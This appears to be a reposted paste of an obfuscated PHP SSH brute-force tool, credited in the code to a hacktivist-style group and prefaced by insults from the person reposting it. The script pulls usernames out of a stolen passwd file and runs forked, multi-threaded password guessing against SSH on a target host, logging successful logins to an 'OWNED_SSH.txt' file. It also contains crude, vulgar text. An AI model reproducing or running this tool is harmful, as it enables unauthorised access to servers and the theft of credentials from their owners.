[PHP] SSH/LFI BRUTEFORCER

1. You fucking suck cyber monkeys. Got #rekt by omgmojo, isn't ironic? ;)
2. original paste: http://pastebin.com/JdBCReK4
3. ======================================================================
4. YOUTUBE: https://www.youtube.com/channel/UCKrBVABCVClHt_IK4NDbewQ
5. PAGE: http://omgmojo.blogspot.com
6. TWITTER: https://twitter.com/omgmojo
7. ======================================================================
8. <?php $ {
9.     "GLOBALS"
10. }
11. ["mrjdmklbqo"] = "key";
12. $ {
13.     "GLOBALS"
14. }
15. ["xpxmkm"] = "list";
16. $ {
17.     "GLOBALS"
18. }
19. ["dyleznfck"] = "pid";
20. $ {
21.     "GLOBALS"
22. }
23. ["uwvkxgml"] = "out";
24. $ {
25.     "GLOBALS"
26. }
27. ["jwhwhooy"] = "fin";
28. $ {
29.     "GLOBALS"
30. }
31. ["iglejbrsagl"] = "count";
32. $ {
33.     "GLOBALS"
34. }
35. ["ivgfrmueyw"] = "childs";
36. $ {
37.     "GLOBALS"
38. }
39. ["ednlxp"] = "thr";
40. $ {
41.     "GLOBALS"
42. }
43. ["egntxungp"] = "threadsn";
44. $ {
45.     "GLOBALS"
46. }
47. ["ubawnbxot"] = "user";
48. $ {
49.     "GLOBALS"
50. }
51. ["vimiojkz"] = "auth";
52. $ {
53.     "GLOBALS"
54. }
55. ["ufionynq"] = "password";
56. $ {
57.     "GLOBALS"
58. }
59. ["vbcytmbyx"] = "connect";
60. $ {
61.     "GLOBALS"
62. }
63. ["ydmhbtfs"] = "fp";
64. $ {
65.     "GLOBALS"
66. }
67. ["psbiumgplngf"] = "file";
68. set_time_limit(0);
69. error_reporting(E_ALL);
70. function save_content($content, $file) {
71.     $xawieqfdp = "content";
72.     $ulupodpobgb = "fp";
73.     $mdqslnnvvu = "fp";
74.     $ {
75.         $mdqslnnvvu
76.     } = fopen($ {
77.         $ {
78.             "GLOBALS"
79.         }
80.         ["psbiumgplngf"]
81.     }, "a");
82.     fwrite($ {
83.         $ {
84.             "GLOBALS"
85.         }
86.         ["ydmhbtfs"]
87.     }, $ {
88.         $xawieqfdp
89.     } . "
90. ");
91.     fclose($ {
92.         $ulupodpobgb
93.     });
94. }
95. function try_user($user) {
96.     $ {
97.         "GLOBALS"
98.     }
99.     ["jkscwpjoyz"] = "user";
100.     $ {
101.         "GLOBALS"
102.     }
103.     ["oxyhcwvgtkv"] = "user";
104.     $rvqurhd = "auth";
105.     global $host;
106.     $sbqypmw = "auth";
107.     $ {
108.         "GLOBALS"
109.     }
110.     ["oswcqvy"] = "connect";
111.     print "Trying -> {$user}:{$user} AT {$host}
112. ";
113.     $ {
114.         $ {
115.             "GLOBALS"
116.         }
117.         ["oswcqvy"]
118.     } = @ssh2_connect($host, 22);
119.     $ {
120.         $sbqypmw
121.     } = @ssh2_auth_password($ {
122.         $ {
123.             "GLOBALS"
124.         }
125.         ["vbcytmbyx"]
126.     }, $ {
127.         $ {
128.             "GLOBALS"
129.         }
130.         ["jkscwpjoyz"]
131.     }, $ {
132.         $ {
133.             "GLOBALS"
134.         }
135.         ["oxyhcwvgtkv"]
136.     });
137.     if ($ {
138.         $rvqurhd
139.     }) {
140.         print "+----------------------------------------------------------+
141. ";
142.         print "[+] Host: {$host}
143. ";
144.         print "[+] User: {$user}
145. ";
146.         print "[+] Password: {$user}
147. ";
148.         print "+----------------------------------------------------------+
149. ";
150.         save_content("HOST: {$host}, USER: {$user}, PASS: {$user}", "OWNED_SSH.txt");
151.         return TRUE;
152.     }
153.     return FALSE;
154. }
155. function connect($user) {
156.     global $wordlist, $host;
157.     $ {
158.         "GLOBALS"
159.     }
160.     ["snqdujutd"] = "user";
161.     if (try_user($ {
162.         $ {
163.             "GLOBALS"
164.         }
165.         ["snqdujutd"]
166.     })) exit(0);
167.     $dnrwmm = "wordlist";
168.     foreach ($ {
169.         $dnrwmm
170.     } as $ {
171.         $ {
172.             "GLOBALS"
173.         }
174.         ["ufionynq"]
175.     }) {
176.         $yievsny = "connect";
177.         print "Trying -> {$user}:{$password} AT {$host}
178. ";
179.         $ {
180.             $yievsny
181.         } = @ssh2_connect($host, 22);
182.         $ {
183.             $ {
184.                 "GLOBALS"
185.             }
186.             ["vimiojkz"]
187.         } = @ssh2_auth_password($ {
188.             $ {
189.                 "GLOBALS"
190.             }
191.             ["vbcytmbyx"]
192.         }, $ {
193.             $ {
194.                 "GLOBALS"
195.             }
196.             ["ubawnbxot"]
197.         }, $ {
198.             $ {
199.                 "GLOBALS"
200.             }
201.             ["ufionynq"]
202.         });
203.         if ($ {
204.             $ {
205.                 "GLOBALS"
206.             }
207.             ["vimiojkz"]
208.         }) {
209.             print "+----------------------------------------------------------+
210. ";
211.             print "[+] Host:  
212. ";
213.             print "[+] User: {$user}
214. ";
215.             print "[+] Password: {$password}
216. ";
217.             print "+----------------------------------------------------------+
218. ";
219.             save_content("HOST: {$host}, USER: {$user}, PASS: {$password}", "OWNED_SSH.txt");
220.             break;
221.         }
222.     }
223. }
224. function main($list, $threadsn) {
225.     $ {
226.         "GLOBALS"
227.     }
228.     ["fpoklinkyc"] = "fin";
229.     $lniisqxhsdm = "thr";
230.     $ucnurts = "ini";
231.     $ {
232.         "GLOBALS"
233.     }
234.     ["lhwgnoemd"] = "out";
235.     $ {
236.         $ {
237.             "GLOBALS"
238.         }
239.         ["lhwgnoemd"]
240.     } = 0;
241.     $ {
242.         $lniisqxhsdm
243.     } = $ {
244.         $ {
245.             "GLOBALS"
246.         }
247.         ["egntxungp"]
248.     };
249.     $ {
250.         $ucnurts
251.     } = 0;
252.     $ {
253.         $ {
254.             "GLOBALS"
255.         }
256.         ["fpoklinkyc"]
257.     } = $ {
258.         $ {
259.             "GLOBALS"
260.         }
261.         ["ednlxp"]
262.     } - 1;
263.     while (1) {
264.         $uewoxds = "ini";
265.         $ {
266.             $ {
267.                 "GLOBALS"
268.             }
269.             ["ivgfrmueyw"]
270.         } = array();
271.         $ {
272.             "GLOBALS"
273.         }
274.         ["sgsegsi"] = "ini";
275.         $wfuhubd = "pid";
276.         for ($ {
277.             $ {
278.                 "GLOBALS"
279.             }
280.             ["iglejbrsagl"]
281.         } = $ {
282.             $uewoxds
283.         };$ {
284.             $ {
285.                 "GLOBALS"
286.             }
287.             ["iglejbrsagl"]
288.         } <= $ {
289.             $ {
290.                 "GLOBALS"
291.             }
292.             ["jwhwhooy"]
293.         };$ {
294.             $ {
295.                 "GLOBALS"
296.             }
297.             ["iglejbrsagl"]
298.         }
299.         ++) {
300.             $qgfqmwhviba = "count";
301.             $yvjxysduops = "pid";
302.             $sfklscdlivm = "list";
303.             if (empty($ {
304.                 $sfklscdlivm
305.             }
306.             [$ {
307.                 $qgfqmwhviba
308.             }
309.             ])) {
310.                 $ {
311.                     $ {
312.                         "GLOBALS"
313.                     }
314.                     ["uwvkxgml"]
315.                 } = 1;
316.                 continue;
317.             }
318.             $ {
319.                 $ {
320.                     "GLOBALS"
321.                 }
322.                 ["dyleznfck"]
323.             } = pcntl_fork();
324.             if ($ {
325.                 $ {
326.                     "GLOBALS"
327.                 }
328.                 ["dyleznfck"]
329.             } == - 1) {
330.                 echo "Fork error
331. ";
332.                 exit(1);
333.             } else if ($ {
334.                 $yvjxysduops
335.             }) {
336.                 $rqwwekclf = "pid";
337.                 $knitucd = "childs";
338.                 array_push($ {
339.                     $knitucd
340.                 }, $ {
341.                     $rqwwekclf
342.                 });
343.             } else {
344.                 $ {
345.                     "GLOBALS"
346.                 }
347.                 ["cuykofg"] = "n";
348.                 $ {
349.                     $ {
350.                         "GLOBALS"
351.                     }
352.                     ["cuykofg"]
353.                 } = $ {
354.                     $ {
355.                         "GLOBALS"
356.                     }
357.                     ["iglejbrsagl"]
358.                 } + 1;
359.                 $ {
360.                     "GLOBALS"
361.                 }
362.                 ["hrkjgpele"] = "count";
363.                 connect($ {
364.                     $ {
365.                         "GLOBALS"
366.                     }
367.                     ["xpxmkm"]
368.                 }
369.                 [$ {
370.                     $ {
371.                         "GLOBALS"
372.                     }
373.                     ["hrkjgpele"]
374.                 }
375.                 ]);
376.                 exit(0);
377.             }
378.         }
379.         foreach ($ {
380.             $ {
381.                 "GLOBALS"
382.             }
383.             ["ivgfrmueyw"]
384.         } as $ {
385.             $ {
386.                 "GLOBALS"
387.             }
388.             ["mrjdmklbqo"]
389.         } => $ {
390.             $wfuhubd
391.         }) {
392.             $ {
393.                 "GLOBALS"
394.             }
395.             ["rdjvgtxtmn"] = "pid";
396.             $ {
397.                 "GLOBALS"
398.             }
399.             ["akbedyfcorhr"] = "status";
400.             pcntl_waitpid($ {
401.                 $ {
402.                     "GLOBALS"
403.                 }
404.                 ["rdjvgtxtmn"]
405.             }, $ {
406.                 $ {
407.                     "GLOBALS"
408.                 }
409.                 ["akbedyfcorhr"]
410.             });
411.         }
412.         if ($ {
413.             $ {
414.                 "GLOBALS"
415.             }
416.             ["uwvkxgml"]
417.         } == 1) {
418.             return;
419.         }
420.         $ {
421.             $ {
422.                 "GLOBALS"
423.             }
424.             ["sgsegsi"]
425.         } = $ {
426.             $ {
427.                 "GLOBALS"
428.             }
429.             ["jwhwhooy"]
430.         } + 1;
431.         $ {
432.             $ {
433.                 "GLOBALS"
434.             }
435.             ["jwhwhooy"]
436.         } = $ {
437.             $ {
438.                 "GLOBALS"
439.             }
440.             ["jwhwhooy"]
441.         } + $ {
442.             $ {
443.                 "GLOBALS"
444.             }
445.             ["ednlxp"]
446.         };
447.     }
448. }
449. if (!isset($argv[1], $argv[2], $argv[3], $argv[4])) {
450.     print "SSH BRUTE FORCE BY THE GREATEST skid ever
451. ";
452.     print "Passwd must be a valid passwd file (unix-like)
453. ";
454.     print "# CODED BY : THE GREATEST lammer ever ( https://www.facebook.com/aloushi1994 )
455. ";
456.     print "# CODED IN : Middle East Cyber monkey Labs
457. ";
458.     print "# PAGE: https://www.facebook.com/Middle.East.Cyber.Army
459. ";
460.     print "# GROUP : https://www.facebook.com/groups/Middle.East.Cyber.Army
461. ";
462.     print "# TWITTER: https://twitter.com/MiddleEastCyber
463. ";
464.     print "USAGE: php {$argv[0]} host users.txt pass.txt threads suck my cock
465. ";
466.     exit(0);
467. } else {
468.     $ {
469.         "GLOBALS"
470.     }
471.     ["yskcqyk"] = "passwd";
472.     if (!function_exists("ssh2_connect")) die("ssh2_lib functions not found friend!
473. Try apt-get install libssh2-php to fix this issue or packager similar('yum')
474. ");
475.     print "SSH BRUTE FORCE BY THE GREATEST
476. ";
477.     $ {
478.         "GLOBALS"
479.     }
480.     ["corvrjcmjtl"] = "thread";
481.     $host = trim("$argv[1]");
482.     $ {
483.         $ {
484.             "GLOBALS"
485.         }
486.         ["yskcqyk"]
487.     } = trim("$argv[2]");
488.     $ {
489.         "GLOBALS"
490.     }
491.     ["fnkhee"] = "user";
492.     system("cat {$passwd} | grep -e '/bash' -e '/sh' | cut -d ":
493.         \" -f 1 >> extracted_users;");
494.         $ {
495.             $ {
496.                 "GLOBALS"
497.             }
498.             ["fnkhee"]
499.         } = explode("
500. ", file_get_contents("extracted_users"));
501.         $ {
502.             "GLOBALS"
503.         }
504.         ["vkrkyfip"] = "wordlist";
505.         $ {
506.             "GLOBALS"
507.         }
508.         ["qecqwecac"] = "user";
509.         $ {
510.             $ {
511.                 "GLOBALS"
512.             }
513.             ["vkrkyfip"]
514.         } = explode("
515. ", file_get_contents("$argv[3]"));
516.         $ {
517.             $ {
518.                 "GLOBALS"
519.             }
520.             ["corvrjcmjtl"]
521.         } = trim("$argv[4]");
522.         $ {
523.             "GLOBALS"
524.         }
525.         ["utqhlldw"] = "thread";
526.         main($ {
527.             $ {
528.                 "GLOBALS"
529.             }
530.             ["qecqwecac"]
531.         }, $ {
532.             $ {
533.                 "GLOBALS"
534.             }
535.             ["utqhlldw"]
536.         });
537.         @unlink("extracted_users");
538.     }
539.     echo "?>
540. ";
541. ?>